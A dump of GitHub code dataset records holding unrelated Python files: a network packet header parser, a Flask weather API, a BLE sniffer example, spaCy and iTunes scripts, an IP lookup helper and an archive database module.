unpack(f'!{proto_add_len}B', data[current : current + proto_add_len]) # returns a tupel of ip. e.g(192, 168, ...)\n current += proto_add_len\n\n\n dst_hw = unpack(f'!{hw_add_len}s', data[current : current + hw_add_len])[0]\n current += hw_add_len\n \n dst_proto_add = unpack(f'!{proto_add_len}B', data[current : current + proto_add_len])\n current += proto_add_len\n\n arp_fields = {\n 'Hardware type': hw_type,\n 'Protocol type': proto_type,\n 'Hardware address length': hw_add_len,\n 'Protocol address length': proto_add_len,\n 'Opcode': opcode,\n 'Source hardware address': retrive_mac(src_hw),\n 'Source protocol address': '.'.join(map(str, src_proto_add)),\n 'Destination hardware address': retrive_mac(dst_hw),\n 'Destination protocol address': '.'.join(map(str, dst_proto_add))\n }\n\n if current < len(data):\n arp_fields['Data'] = repr(data[current])\n\n return (arp_fields, None) # because other functions return 2 objects, in order to be match with them returning a none\n\n\ndef udp(data):\n # decapsulation of UDP packets\n src_port, dst_port, length, checksum = unpack('!4H',data[:8])\n return ({\n 'Source port number': src_port,\n 'Destination port number': dst_port,\n 'Length': length,\n 'CheckSum': checksum\n }, data[8:])\n\ndef tcp(data):\n # decapsulates TCP packets\n src_port, dst_port, seq_num, ack_num, header_len, flags, win_size, checksum, urg_ptr = unpack('!HHIIBBHHH', data[:20])\n current = 20 # a pointer to byte number we are reading\n \n # header length is from bit number 97 to 100 in tcp header but in the line above we got 1 byte in header length (97-104)\n # bit number 104 is nounce flag and bits 101, 102, 103 are reserved and are set to 0\n nounce = header_len % 2\n header_len = (header_len & (15 * 16)) // 16 # taking off those 4 bits\n header_len *= 4 # header length in tcp should be multiplied by 4\n\n tcp_fields = {\n 'Source port number': src_port,\n 'Destination port number': dst_port,\n 'Sequence number': seq_num,\n 'Acknowledgement number': ack_num,\n 'Header length': header_len,\n 'Nounce': nounce\n }\n\n flag_names = ('CWR', 'ECE', 'URG', 'ACK', 'PSH', 'RST', 'SYN', 'FIN')\n for item in reversed(flag_names): # because each time we are getting the last bit names should go from last to first\n tcp_fields[item] = flags % 2\n flags = flags // 2\n\n tcp_fields.update((('Window size', win_size), ('Checksum', checksum), ('Urgent pointer', urg_ptr)))\n\n if header_len > 20: # tcp packet has some optoins\n tcp_fields['Options'] = repr(data[current: header_len])\n current = header_len\n \n return (tcp_fields, data[current:])\n\n\ndef dns(data):\n # decapsulates dns packets\n \n def get_dns_name(data, start):\n # gets dns packet(bytes) and the number of the first bit of name and returns the name\n tmp = data[start]\n direct = True # whether it is a pointer to name or not\n \n current = start\n\n if tmp // 64 == 3: # a pointer to a name\n current = 256 * (data[start] % 64) + data[start + 1]\n direct = False\n \n res = str()\n while data[current] != 0:\n res += chr(data[current])\n current += 1\n \n return (res, current) if direct else (res, start + 1)\n\n def extract_record_dns(data, current, types): \n # is used to extract answer and authority and additional records. return new and current position in bytes obj\n name, current = get_dns_name(data, current)\n current += 1\n new = {\n 'Name': name,\n 'Type': unpack('!H', data[current : current + 2])[0],\n 'Class': unpack('!H', data[current + 2 : current + 4])[0],\n 'TTL': unpack('!I', data[current + 4 : current + 8])[0],\n 'Data length': unpack('!H', data[current + 8: current + 10])[0],\n }\n current += 10\n\n new['Type'] = types.get(new['Type'], new['Type']) # specify some common types\n \n # example for below code: CNAME:dns.google.com\n new[new['Type']] = unpack(f'!{new[\"Data length\"]}s',\n data[current : current + new['Data length']])[0]\n\n current += new['Data length']\n\n if new['Type'] == 'A':\n new['A'] = '.'.join(list(map(lambda x: str(x), new['A']))) # human readable IPv4\n\n return new, current\n\n \n \n id_, flags, num_of_quest, num_of_ans, num_of_auth, num_of_add = unpack('!6H', data[:12])\n current = 12 # a ptr to current number of byte\n \n queries = list()\n answers = list()\n authorities = list()\n additionals = list()\n\n types = {1: 'A', 2: 'NS', 5: 'CNAME', 15: 'MX'}\n\n for i in range(num_of_quest): # information of each query\n name, current = get_dns_name(data, current)\n current += 1\n queries.append({\n 'Name': name,\n 'Type': unpack('!H', data[current : current + 2])[0],\n 'Class': unpack('!H', data[current + 2 : current + 4])[0]\n })\n current += 4\n queries[-1]['Type'] = types.get(queries[-1]['Type'], queries[-1]['Type'])\n\n \n for i in range(num_of_ans): # answers\n new_answer, current = extract_record_dns(data, current, types)\n answers.append(new_answer)\n\n\n for i in range(num_of_auth): # authority\n new_authority, current = extract_record_dns(data, current, types)\n authorities.append(new_authority)\n\n\n for i in range(num_of_add):\n new_additional, current = extract_record_dns(data, current, types)\n additionals.append(new_additional)\n \n #id_, flags, num_of_quest, num_of_ans, num_of_auth, num_of_add\n\n dns_info = {\n 'ID': id_,\n 'Response': flags // (2 ** 15), # first bit of flags\n 'Opcode': (flags // (2 ** 11)) & 15, # bit number 2 to 5\n 'Trunced': (flags // (2 ** 9)) & 1, # bit number 7\n 'Recursive': (flags // (2 ** 8)) & 1, # bit number 8\n 'Non-authenticated data': (flags // (2 ** 4)) & 1, # bit number 12\n }\n\n if dns_info['Response']: # adding flags which are related to response dns\n dns_info.update({\n 'Authoritive DNS answer': (flags // (2 ** 10)) & 1, # bit number 6\n 'Recursion available': (flags // (2 ** 7)) & 1, # bit number 9\n 'Ans/Auth was authenticated': (flags // (2 ** 5)) &1, # bit number 11\n 'Status code': flags & 15 # bit number 13-16\n })\n \n dns_info.update({\n 'Questions': num_of_quest,\n 'Answer RR': num_of_ans,\n 'Authority RR': num_of_auth,\n 'Additional RR': num_of_add,\n 'Queries': queries,\n 'Answers': answers,\n 'Authorities': authorities,\n 'Additionals': additionals\n })\n\n return dns_info\n\n\ndef http(data):\n # decapsulating http request and response\n http = data.split(b'\\r\\n\\r\\n')\n if len(http) == 2: # There is both header and message\n header, message = http\n header = list(map(lambda x: x.decode(), header.split(b'\\r\\n')))\n # header = header.split(b'\\r\\n')\n\n elif len(http) == 1: # There is no data or juts headers\n header = http[0]\n message = ''\n try:\n header = list(map(lambda x: x.decode(), header.split(b'\\r\\n')))\n except UnicodeDecodeError: # html code was broken into some parts. it's the continue of one of them\n message = http[0]\n header = ''\n # header = header.split(b'\\r\\n')\n else:\n return None\n\n return {'Header': header, 'Message': message}\n\n\n# protocol numbers and ports supported\nip_prot, arp_prot = 2048, 2054\ntcp_prot, udp_prot, icmp_prot = 6, 17, 1\nhttp_prot, dns_prot = 80, 53\n\n\n# mapping supported protocols to their related functions\nlayer_two_porotocols = {ip_prot: ip, arp_prot: arp}\nlayer_three_protocols = {tcp_prot: tcp, udp_prot: udp, icmp_prot: icmp}\nlayer_four_protocols = {http_prot: http, dns_prot: dns}\n\n\ndef extract(packet, start='ETH'):\n # gets the packet and returns all of headers in different layers\n\n # start specifies in which layer to start extracting\n # it is useful when working with sockets. because socket receive functions don't have ethernet headers\n # and in order to extract their headers we have to start from ip layer\n\n headers = dict() # a mapping from protocol names to its headers\n status = False # indicates that can packet be extracted. according to start parameter\n\n if start.upper() == 'ETH':\n status = True\n\n if status:\n head, data = ether(packet)\n headers['Ethernet'] = head\n\n ethtype = head['Ethertype']\n\n if ethtype not in layer_two_porotocols: # unsupported protocol\n return\n \n \n if start.upper() == 'IP':\n ethtype = ip_prot\n data = packet\n status = True\n\n if status: \n head, data = layer_two_porotocols[ethtype](data)\n \n if data is None: # arp\n return {\n 'Ethernet': headers['Ethernet'],\n 'ARP': head\n } \n \n headers['IP'] = head # only supported arp and ip in this layer. it is not arp because it has been checked. so it's ip\n\n if head['Protocol number'] not in layer_three_protocols \\\n or head['Source IP address'].startswith('127'):\n # first condition -> unsupported protocol\n # second condition -> loopback\n return\n\n if head['Protocol number'] == tcp_prot:\n name = 'TCP'\n elif head['Protocol number'] == udp_prot:\n name = 'UDP'\n else:\n name = 'ICMP'\n\n head, data = layer_three_protocols[head['Protocol number']](data)\n\n if data is None: # icmp\n return {\n 'Ethernet': headers['Ethernet'],\n 'IP': headers['IP'],\n 'ICMP': head\n }\n\n headers[name] = head\n \n \n if dns_prot in (head['Source port number'], head['Destination port number']): # storing the name of protocol in order to map this name to its related header in upper layer\n name = 'DNS'\n elif http_prot in (head['Source port number'], head['Destination port number']):\n name = 'HTTP'\n else:\n return # it's not dns and http. -> unsupported protocol\n \n\n if head['Source port number'] in layer_four_protocols:\n head = layer_four_protocols[head['Source port number']](data)\n\n elif head['Destination port number'] in layer_four_protocols:\n head = layer_four_protocols[head['Destination port number']](data)\n\n headers[name] = head\n \n return headers\n","repo_name":"sobhansaf/ComputerNetworks-Project","sub_path":"packetExtraction.py","file_name":"packetExtraction.py","file_ext":"py","file_size_in_byte":14797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3423742591","text":"import csv\nfrom flask import Flask, jsonify\nimport numpy as np\nimport pandas as pd\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\n\nmeasurements = []\nstations = []\n\nfile_path = 'Resources/hawaii_measurements.csv'\ninput_file = csv.DictReader(open(file_path))\n\nfor row in input_file:\n measurements.append(row)\n\nfile_path_2 = 'Resources/hawaii_stations.csv'\ninput_file_2 = csv.DictReader(open(file_path_2))\n\nfor row in input_file_2:\n stations.append(row)\n\n\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\nstart_date = dt.datetime(2012, 8, 22)\nend_date = dt.datetime(2014, 8, 22)\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n return (\n f\"Welcome to the Home Page of Hawaii weather data!!!
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation which gives the percipitation on a given date
\"\n f\"/api/v1.0/stations lists all the stations
\"\n f\"/api/v1.0/tobs provides the temperatures from last year
\"\n f\"/api/v1.0/2012.08.22 show the calculate `TMIN`, `TAVG`, and `TMAX` for all dates greater than and equal to the start date
\"\n f\"/api/v1.0/2012.08.22/2014.02.22 is for `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef perc():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \n results = session.query(measurement.date, measurement.prcp).all()\n session.close()\n rain = []\n\n for date, prcp in results:\n rain_dict = {}\n rain_dict['Date'] = date\n rain_dict['Percipitation'] = prcp\n rain.append(rain_dict)\n\n return jsonify(rain)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n session = Session(engine)\n\n results = session.query(measurement.station).group_by(measurement.station).all()\n session.close()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n\n session = Session(engine)\n recent_date = dt.datetime(2016, 8, 22)\n results = st_top = session.query(measurement.station, measurement.date, measurement.tobs).\\\n filter(measurement.station=='USC00516128').\\\n filter(measurement.date>recent_date).all()\n session.close() \n\n tobs_station = list(np.ravel(results))\n\n return jsonify(tobs_station)\n\n@app.route(\"/api/v1.0/2012.08.22\")\ndef start():\n session = Session(engine)\n\n \n \n temp_sel = session.query(func.avg(measurement.tobs),\n func.min(measurement.tobs),\n func.max(measurement.tobs)).filter(measurement.date>start_date).all()\n\n the_avg = session.query(func.avg(measurement.tobs).filter(measurement.date>start_date)).all(),\n the_min = session.query(func.min(measurement.tobs).filter(measurement.date>start_date)).all(),\n the_max = session.query(func.max(measurement.tobs)).filter(measurement.date>start_date).all()\n \n session.close()\n\n temp_start = list(np.ravel(temp_sel))\n\n return jsonify(temp_start,\n f\"The max is {the_max}\",\n f\"The min is {the_min}\",\n f\"The avg is {the_avg}\"\n )\n\n@app.route(\"/api/v1.0/2012.08.22/2014.02.22\")\ndef end():\n session = Session(engine)\n\n \n \n temp_sel_2 = session.query(func.avg(measurement.tobs),\n func.min(measurement.tobs),\n func.max(measurement.tobs)).filter(measurement.date>start_date).filter(measurement.datestart_date).filter(measurement.datestart_date).filter(measurement.datestart_date).filter(measurement.date 0:\n # Initialize the sniffer on the first COM port found with baudrate 1000000.\n # If you are using an old firmware version <= 2.0.0, simply remove the baudrate parameter here.\n mySniffer = Sniffer.Sniffer(portnum=ports[0], baudrate=1000000)\n \n else:\n print(\"No sniffers found!\")\n return\n \n # Start the sniffer module. This call is mandatory.\n mySniffer.start()\n # Scan for new advertisers\n mySniffer.scan()\n\n # Wait to allow the sniffer to discover device mySniffer.\n time.sleep(5)\n # Retrieve list of discovered devicemySniffer.\n d = mySniffer.getDevices()\n # Find device with name \"Example\".\n dev = d.find('Example')\n \n if dev is not None:\n # Follow (sniff) device \"Example\". This call sends a REQ_FOLLOW command over UART.\n mySniffer.follow(dev)\n else:\n print(\"Could not find device\")\n\ndef loop():\n # Enter main loop\n nLoops = 0\n while True:\n time.sleep(0.1)\n # Get (pop) unprocessed BLE packets.\n packets = mySniffer.getPackets()\n \n processPackets(packets) # function defined below\n \n nLoops += 1\n \n # print diagnostics every so often\n if nLoops % 20 == 0:\n print(mySniffer.getDevices())\n print(\"inConnection\", mySniffer.inConnection)\n print(\"currentConnectRequest\", mySniffer.currentConnectRequest)\n print(\"packetsInLastConnection\", mySniffer.packetsInLastConnection)\n print(\"nPackets\", nPackets)\n print()\n \n# Takes list of packets\ndef processPackets(packets):\n for packet in packets:\n # packet is of type Packet\n # packet.blePacket is of type BlePacket\n global nPackets\n # if packet.OK:\n # Counts number of packets which are not malformed.\n nPackets += 1\n \nsetup()\nif mySniffer is not None:\n loop()\n","repo_name":"zapta/ble_stepper_motor_analyzer","sub_path":"tools/nordic_sniffer/nrf_sniffer_for_bluetooth_le_4.1.1/doc/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"30835189602","text":"import spacy\n# import displacy\nfrom spacy import displacy\nfrom collections import Counter\n\nnlp = spacy.load('en_core_web_sm')\ncomplete_text = ('Gus Proto is a Python developer currently'\n 'working for a London-based Fintech company. He is'\n ' interested in learning Natural Language Processing.'\n ' There is a developer conference happening on 21 July'\n ' 2019 in London. It is titled \"Applications of Natural'\n ' Language Processing\". There is a helpline number '\n ' available at +1-1234567891. Gus is helping organize it.'\n ' He keeps organizing local Python meetups and several'\n ' internal talks at his workplace. Gus is also presenting'\n ' a talk. The talk will introduce the reader about \"Use'\n ' cases of Natural Language Processing in Fintech\".'\n ' Apart from his work, he is very passionate about music.'\n ' Gus is learning to play the Piano. He has enrolled '\n ' himself in the weekend batch of Great Piano Academy.'\n ' Great Piano Academy is situated in Mayfair or the City'\n ' of London and has world-class piano instructors.')\n\ncomplete_doc = nlp(complete_text)\n# Remove stop words and punctuation symbols\nwords = [token.text for token in complete_doc\n if not token.is_stop and not token.is_punct]\nword_freq = Counter(words)\n# 5 commonly occurring words with their frequencies\ncommon_words = word_freq.most_common(5)\nprint('common words')\nprint(common_words)\n\n# Iterate over the tokens\nfor token in complete_doc:\n # Print the token and its part-of-speech tag\n print(token.text, \"-->\", token.pos_)\n\ndisplacy.serve(complete_doc, style=\"ent\")\n","repo_name":"jaycedel/TextMiningAssignment2","sub_path":"spacy_parser.py","file_name":"spacy_parser.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72927984892","text":"import itunespy\nimport json\nimport re, json, ast\n\nresult = {}\nresult['video'] = []\n\ndef getVideo(result,search_name):\n videos = itunespy.search(search_name, media='musicVideo')\n data = {}\n data['name'] = []\n data['image'] = []\n data['preview_link'] = []\n data['collection_name'] = []\n data['year'] = []\n data['type'] = []\n temp_name = []\n temp_image = []\n temp_link = []\n temp_collection = []\n temp_year = []\n temp_type = []\n for i in range(len(videos)):\n temp_name.append(videos[i].artist_name)\n temp_image.append(videos[i].artwork_url_100)\n temp_link.append(videos[i].preview_url)\n temp_collection.append(videos[i].track_name)\n temp_year.append(videos[i].release_date[0:10])\n temp_type.append(videos[i].track_type)\n for i in range(len(videos)):\n data = {}\n data['name'] = temp_name[i]\n data['image'] = temp_image[i]\n data['preview_link'] = temp_link[i]\n data['collection_name'] = temp_collection[i]\n data['year'] = temp_year[i]\n data['type'] = temp_type[i]\n result['video'].append(ast.literal_eval(json.dumps(data)))\n\n\n\nif __name__ == '__main__':\n result = {}\n result['video'] = []\n getVideo(result, 'oasis')\n getVideo(result, 'the beatles')\n getVideo(result, 'blake shelton')\n getVideo(result, 'sigur ros')\n getVideo(result, 'queen')\n getVideo(result, 'kanye west')\n\n with open('video_data.json', 'w') as outfile:\n json.dump(result, outfile, indent=4)","repo_name":"yaoxiaosui/Music-Lover","sub_path":"FinalProject/video_api.py","file_name":"video_api.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20025109931","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport dipy.tracking.utils as dtu\nimport pandas as pd\nimport nibabel as nib\n#get_ipython().magic(u'matplotlib inline')\nimport sys\n\n\n# In[3]:\nregion = sys.argv[1]\n\nDATA_PATH = \"/Users/aarya/Atlas/tracks/\"+str(region)\n\nimport os\nimport os.path as op\nfrom glob import glob\n\n\n# In[19]:\n\nlabels = [f for f in os.listdir(DATA_PATH) if not f.startswith('.')]\n#len(labels)\n\n\n# In[5]:\n\nbundle_fnames = glob(op.join(DATA_PATH, '*.trk'))\n#bundle_fnames[0]\n\n\n# In[7]:\n\nt1_shape = (256, 256, 150)\n\n\n# In[8]:\nsl_sum = 0\nsls = []\nprint('Bundles and number of streamlines: \\n')\nfor b_idx, bundle in enumerate(bundle_fnames):\n tgram = nib.streamlines.load(op.join(DATA_PATH, bundle))\n print(bundle, len(tgram.streamlines))\n sls.append(len(tgram.streamlines))\n sl_sum += len(tgram.streamlines)\n\nminsls = min(sls)\nprint('\\n\\n')\n# In[10]:\n\ndef get_bname(f):\n return f.split('/')[-1].split('.')[0]\n\n# In[14]:\n\nii = 0\nnewpath = DATA_PATH+'/slines'\nif not os.path.exists(newpath):\n os.makedirs(newpath)\nfor b_idx, bundle in enumerate(bundle_fnames):\n tgram = nib.streamlines.load(op.join(DATA_PATH, bundle))\n print(bundle, len(tgram.streamlines))\n for sl_idx, sl in enumerate(list(dtu.move_streamlines(tgram.streamlines, np.linalg.inv(tgram.affine)))):\n if sl_idx > minsls:\n break\n bname = get_bname(bundle)\n savepath = newpath+\"/\"+bname+'-'+str(sl_idx)\n if not np.mod(sl_idx, 100):\n #print(\"Streamline {0} at index {1}\".format(sl_idx, ii))\n print(\"Streamline {0} at index {1} of Bundle {2} saved at path {3}\".format(sl_idx, ii, bname, savepath))\n vol = np.zeros(t1_shape + (1,), dtype=bool)\n sl = np.round(sl).astype(int).T\n vol[sl[0], sl[1], sl[2]] = 1\n a1 = np.max(vol, 0).squeeze()\n for x in range(1,3):\n a1 = np.concatenate((a1, np.max(vol, x).squeeze()), axis=1)\n np.save(savepath, a1)\n ii += 1\n\n\n# In[15]:\n\ndef get_label(path):\n x = path.split('/')[-1].split('_')[:2]\n return '_'.join(x)\n\n\n# In[16]:\n\ndef get_dataframe(directory):\n paths = [os.path.join(directory, f) for f in os.listdir(directory) if not f.startswith('.')]\n labels = [get_label(path) for path in paths if not path.startswith('.')]\n return pd.DataFrame({'paths': paths, 'labels': labels})\nd = get_dataframe(newpath)\nd.head()\n\n\n# In[18]:\n\n\n\n\n\n","repo_name":"aarya22/Atlas","sub_path":"atlas_munging.py","file_name":"atlas_munging.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16646090510","text":"# from lights_part_1 import Lights, DIMENSIONS\nfrom lights_part_2 import Lights, DIMENSIONS\n\nlights = Lights(DIMENSIONS)\n\nwith open(\"input.txt\", \"r\") as f:\n instructions = f.readlines()\n \n for instruction in instructions:\n lights.read_instruction(instruction)\n\n # part 1\n #print(lights.get_total_lights_on())\n\n # part 2\n print(lights.get_total_brightness())\n\n \n","repo_name":"sid-707/Advent-of-Code-2015-Python","sub_path":"day-6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32241182590","text":"import requests\nimport json\n\ndef lookup_data(ip_address):\n response = requests.get(f\"https://ipinfo.io/{ip_address}/json\")\n return response.json()\n\ndef save_data(data, filename):\n with open(filename, 'w') as f:\n json.dump(data, f)\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n return json.load(f)\n\ndef ip_lookup(ip_address, filename):\n data = lookup_data(ip_address)\n save_data(data, filename)\n\nif __name__ == \"__main__\":\n ip_address = input(\"Enter the IP address: \")\n filename = \"ip_data.json\"\n ip_lookup(ip_address, filename)\n data = load_data(filename)\n print(data)\n","repo_name":"geeknik/tiny-python-scripts","sub_path":"osint/ip_lookup.py","file_name":"ip_lookup.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"34863074485","text":"#!/usr/bin/env python3\n\n'''\nModule for Splitting scripts to\nretrieve carrier information inc\nsiblings, cousins, partWholes,\npackage, can data, segments etc.\n\nNote:\nContent class is out of use in\npost-Imagen DPI workflows\n\nRefactored for Python3\nJoanna White\nJune 2022\n'''\n\n# Public packages\nimport re\nimport os\nimport sys\nimport string\nimport logging\nimport datetime\nimport requests\nfrom PIL import Image\n\n# Private packages\nsys.path.append(os.environ['CODE'])\nimport adlib\n\n# Global variables\nLOGS = os.environ['LOG_PATH']\nLOG_PATH = os.path.join(LOGS, 'splitting_models.log')\nDPI_PATH = os.environ['DPI_API']\nCID_API = os.environ['CID_API']\nCID = adlib.Database(url=CID_API)\n\n# Setup logging, overwrite each time\nlogger = logging.getLogger('split_qnap_test')\nhdlr = logging.FileHandler(LOG_PATH)\nformatter = logging.Formatter('%(asctime)s\\t%(levelname)s\\t%(message)s')\nhdlr.setFormatter(formatter)\nlogger.addHandler(hdlr)\nlogger.setLevel(logging.INFO)\n\n\ndef star(f):\n ''' Allows arg unpacking in lambda '''\n return lambda args: f(*args)\n\n\nclass Item():\n ''' Useful interactions with an item record '''\n\n def __init__(self, priref):\n self.priref = priref\n self.object_number = self._object_number()\n self.containers = Containers(priref)\n self.reels = max(len(i) for i in self.containers.identifiers.values() if i)\n\n def _object_number(self):\n ''' Resolve id '''\n r = cid_get('items', f'priref={self.priref}', 'object_number')\n logger.info(\"Object number: %s\", r.records)\n return r.records[0]['object_number'][0]\n\n def data(self):\n ''' Fetch the complete record '''\n r = cid_get('items', f'priref={self.priref}', '')\n logger.info(\"data: %s\", r.records)\n return r.records[0]\n\n def siblings(self):\n ''' Fetch identifiers of items in same manifestation '''\n q = f'(part_of_reference->(parts_reference.lref={self.priref}))'\n r = cid_get('items', q, 'priref')\n siblings_priref = [int(i['priref'][0]) for i in r.records if i]\n logger.info(\"Siblings: %s\", siblings_priref)\n return siblings_priref\n\n def cousins(self):\n ''' Fetch identifiers of items in any other manifestation in same work '''\n q = f'(part_of_reference->(part_of_reference->(parts_reference->(parts_reference.lref={self.priref}))))'\n r = cid_get('items', q, 'priref')\n cousins_priref = [int(i['priref'][0]) for i in r.records if int(i['priref'][0]) not in self.siblings()]\n logger.info(\"Cousins: %s\", cousins_priref)\n return cousins_priref\n\n\nclass Containers():\n ''' Fetch and wrangle physical label identifiers for the given item priref '''\n\n def __init__(self, priref):\n self.packages = self._packages(priref)\n self.cans = self._cans(priref)\n self.identifiers = {'packages': self.packages, 'cans': self.cans}\n\n def _packages(self, priref):\n ''' Obtain identifiers '''\n q = f'collcopy.number->object.number.lref={priref}'\n r = cid_get('packages', q, 'package_number')\n return [str(i['package_number'][0]) for i in r.records if i]\n\n def _cans(self, priref):\n ''' Wrangle identifier '''\n q = f'priref={priref} and can_ID=*'\n r = cid_get('items', q, 'can_ID')\n logger.info(\"Cans: %s\", r.records[0]['can_ID'][0])\n if r.hits == 0:\n return []\n\n can_id = str(r.records[0]['can_ID'][0])\n\n # N-item, eg 5074964Aa becomes 5074964AA\n if (can_id[-2] == 'A' and can_id[-1].islower()):\n return [f'{can_id[:-1]}A']\n # N-reel, eg 5074964A becomes 5074964AA\n if (can_id[:-1].isnumeric() and can_id[-1].isupper()):\n whole = string.ascii_uppercase.index(can_id[-1]) + 1\n return [ f\"{can_id[:-1]}{i}{can_id[-1]}\" for i in string.ascii_uppercase[:whole] ]\n # No partWhole, all other instances returned as is\n return [can_id]\n\n\nclass PhysicalIdentifier():\n ''' Determine class of label - package number or can ID '''\n\n def __init__(self, identifier):\n self.label = identifier\n self._types = set()\n logger.info(self.label)\n\n # Determine if identifier is used in CID\n d = {'items': 'can_ID', 'containers': 'name'}\n for db in d:\n print(db)\n q = f'{d[db]}=\"{identifier}\"'\n r = cid_get(db, q, 'priref')\n if r.records:\n self._types.add(d[db])\n print(f'* Self_types = {self._types}')\n\n # If ID is unused, does it follow pattern?\n if not self._types:\n # Regex checks for two capital letters\n if re.match(r'^.*[A-Z]{2,3}$', identifier):\n self._types.add('can_ID')\n # Regex looks for seven characters numbers/uppercase any order\n elif re.match(r'^[A-Z0-9]{7}$', identifier):\n self._types.add('package_number')\n\n @property\n def type(self):\n i = len(self._types)\n if i == 1:\n return list(self._types)[0]\n if i > 1:\n # Forces type can_ID over package_number\n return 'can_ID'\n else:\n raise Exception('Unable to determine identifier type from CID')\n\n\nclass Carrier():\n ''' Model data for a carrier from its physical or label '''\n\n def __init__(self, **identifiers):\n self.identifiers = identifiers\n self.partwhole = self._partwhole()\n self._items = None\n\n # Resolve can_ID as package if insufficient data\n if self.partwhole is None and 'can_ID' in self.identifiers:\n packages = set()\n for r in self.items:\n try:\n carriers = r['Parts']\n except KeyError as exc:\n str_except = r['object_number'][0]\n raise Exception(f'Unable to determine partWhole from can_ID - could not use package instead because item {str_except} not linked to a package') from exc\n\n for c in carriers:\n p = c['parts_reference'][0]['current_location.name'][0]['name'][0]\n packages.add(str(p))\n\n if len(packages) == 1:\n self.identifiers['name'] = list(packages)[0]\n self.partwhole = self._partwhole()\n\n self._validate()\n\n def _validate(self):\n ''' Check the data and the model '''\n\n if not self.items:\n raise Exception('Carrier has no documented items')\n if len(self.items) > 1 and self.partwhole[1] > 1:\n raise Exception('Multi-item carrier should not have multiple reels')\n\n def _partwhole(self):\n ''' Determine partwhole from identifier '''\n\n if 'name' in self.identifiers and 'can_ID' in self.identifiers:\n print('* Both Can_ID and Package detected as identifier type...')\n raise Exception('* Both Can_ID and Package detected as identifier type...')\n if 'name' in self.identifiers:\n print('* This is a Container, according to the model, querying CID for part/whole...')\n q_str = self.identifiers['name']\n q = f'current_location.name=\"{q_str}\"'\n r = cid_get('carriersfull', q, 'carrier_part.number,carrier_part.total_numbers')\n if len(r.records) > 1:\n total_recs = len(r.records)\n wholes_all = []\n for num in range(0, total_recs):\n data = r.records[num]\n print(f'* Querying CID for multiple part returns / whole data: {q}')\n try:\n part = int(data['carrier_part.number'][0])\n whole = int(data['carrier_part.total_numbers'][0])\n wholes_all.append(whole)\n print(f'* Part {part} of {whole}')\n except Exception as exc:\n print('* Insufficient reel data in package record')\n raise Exception('* Insufficient reel data in package record') from exc\n if wholes_all.count(wholes_all[0]) != len(wholes_all):\n raise Exception(f'* Whole numbers do not match for all returned partWholes: {wholes_all}')\n\n data = r.records[0]\n print(f'* Querying CID for part / whole data: {q}')\n\n try:\n part = int(data['carrier_part.number'][0])\n whole = int(data['carrier_part.total_numbers'][0])\n print(f'* Part {part} of {whole}')\n except Exception as exc:\n print('* Insufficient reel data in package record')\n raise Exception('* Insufficient reel data in package record') from exc\n return [part, whole]\n\n elif 'can_ID' in self.identifiers:\n print('* This is a Can ID, according to the model, converting can_ID letters to numerical value...')\n print(self.identifiers['can_ID'])\n if re.match(r'.*[A-Z][A-Z]$', self.identifiers['can_ID']):\n # Reads can_ID final two letters, returns numerical value, eg AB = ['1','2']\n return [ string.ascii_uppercase.index(i) + 1 for i in [s for s in self.identifiers['can_ID'][-2:]] ]\n\n def _find_items(self):\n ''' Make query string required to find items '''\n if 'name' in self.identifiers:\n return f\"(parts_reference->(current_location.name={self.identifiers['name']}))\"\n\n if 'can_ID' in self.identifiers:\n if self.partwhole:\n # Multi-item tape\n if self.partwhole[-1] == 1:\n q = self.identifiers['can_ID'][:-1] + '*'\n else:\n q = self.identifiers['can_ID'][:-2] + self.identifiers['can_ID'][-1]\n else:\n q = self.identifiers['can_ID']\n\n return f'(can_ID=\"{q}\")'\n\n @property\n def items(self):\n ''' Fetch all item data '''\n if self._items is None:\n q = f'{self._find_items()} sort can_ID,priref ascending'\n r = cid_get('items', q, '')\n self._items = r.records\n\n return self._items\n\n def _field_value(self, field, value_instance=None):\n ''' Helper function for extracting field values from records '''\n values = []\n\n for r in self.items.records:\n try:\n if field in r:\n if value_instance:\n values.append(r[field][0]['value'][value_instance])\n else:\n values.append(r[field][0])\n except KeyError:\n pass\n\n return values\n\n @property\n def duration(self):\n ''' Sum all known durations of carried items'''\n try:\n total = sum(float(i) for i in self._field_value('video_duration'))\n return round(total, 2)\n except Exception as exc:\n print(exc)\n\n @property\n def video_format(self):\n ''' Return list of video formats '''\n try:\n return list(set(self._field_value('video_format', value_instance=1)))\n except IndexError:\n pass\n\n @property\n def status(self):\n ''' Return list of copy statuses '''\n try:\n return list(set(self._field_value('copy_status', value_instance=1)))\n except Exception as exc:\n 